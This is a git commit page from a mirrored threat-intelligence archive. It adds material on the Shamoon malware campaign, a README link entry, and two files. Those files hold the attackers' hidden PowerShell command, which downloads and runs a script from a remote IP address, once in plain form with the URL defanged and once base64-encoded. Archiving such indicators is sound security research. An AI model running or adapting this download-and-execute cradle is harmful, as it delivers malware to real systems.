mirror of
https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections
synced 2024-06-16 12:00:04 +00:00
2017.02.15.the-full-shamoon
This commit is contained in:
parent
f2c3e35ae3
commit
3bfb110042
1
2017/2017.02.15.the-full-shamoon/decode.txt
Normal file
1
2017/2017.02.15.the-full-shamoon/decode.txt
Normal file
@ -0,0 +1 @@
|
||||
PowerShell.exe -w hidden -noni -nop -c “iex(New-Object System.Net.WebClient).DownloadString(‘hxxp://139.59.46.154:3485/eiloShaegae1’)”
|
1
2017/2017.02.15.the-full-shamoon/embedded_powershell.txt
Normal file
1
2017/2017.02.15.the-full-shamoon/embedded_powershell.txt
Normal file
@ -0,0 +1 @@
|
||||
PowerShell.exe -window hidden -e cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQB3ACAAaABpAGQAZABlAG4AIAAtAG4AbwBuAGkAIAAtAG4AbwBwACAALQBjACAAIgBpAGUAeAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADMAOQAuADUAOQAuADQANgAuADEANQA0ADoAMwA0ADgANQAvAGUAaQBsAG8AUwBoAGEAZQBnAGEAZQAxACcAKQAiAA==
|
BIN
2017/2017.02.15.the-full-shamoon/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks.pdf
Normal file
BIN
2017/2017.02.15.the-full-shamoon/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks.pdf
Normal file
Binary file not shown.
@ -16,6 +16,7 @@ Please fire issue to me if any lost of APT/Malware events/campaigns.
|
||||
* Feb 20 - [Lazarus' False Flag Malware](http://baesystemsai.blogspot.tw/2017/02/lazarus-false-flag-malware.html) | [Local](../../blob/master/2017/2017.02.20.Lazarus_False_Flag_Malware)
|
||||
* Feb 17 - [ChChes - Malware that Communicates with C&C Servers Using Cookie Headers](http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html) [Local](../../blob/master/2017/2017.02.17.chches-malware)
|
||||
* Feb 15 - [Deep Dive On The DragonOK Rambo Backdoor](http://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor) | [Local](../../blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor)
|
||||
* Feb 15 - [The Full Shamoon: How the Devastating Malware Was Inserted Into Networks](https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/) | [Local](../../blob/master/2017/2017.02.15.the-full-shamoon)
|
||||
* Feb 14 - [Operation Kingphish: Uncovering a Campaign of Cyber Attacks against Civil Society in Qatar and Nepal](https://medium.com/amnesty-insights/operation-kingphish-uncovering-a-campaign-of-cyber-attacks-against-civil-society-in-qatar-and-aa40c9e08852#.cly4mg1g8) | [Local](../../blob/master/2017/2017.02.14.Operation_Kingphish)
|
||||
* Feb 10 - [Enhanced Analysis of GRIZZLY STEPPE Activity](https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf) | [Local](../../blob/master/2017/2017.02.10.Enhanced_Analysis_of_GRIZZLY_STEPPE)
|
||||
* Feb 02 - [Oops, they did it again: APT Targets Russia and Belarus with ZeroT and PlugX](https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx) | [Local](../../blob/master/2017/2017.02.02.APT_Targets_Russia_and_Belarus_with_ZeroT_and_PlugX)
|
||||
|
Loading…
Reference in New Issue
Block a user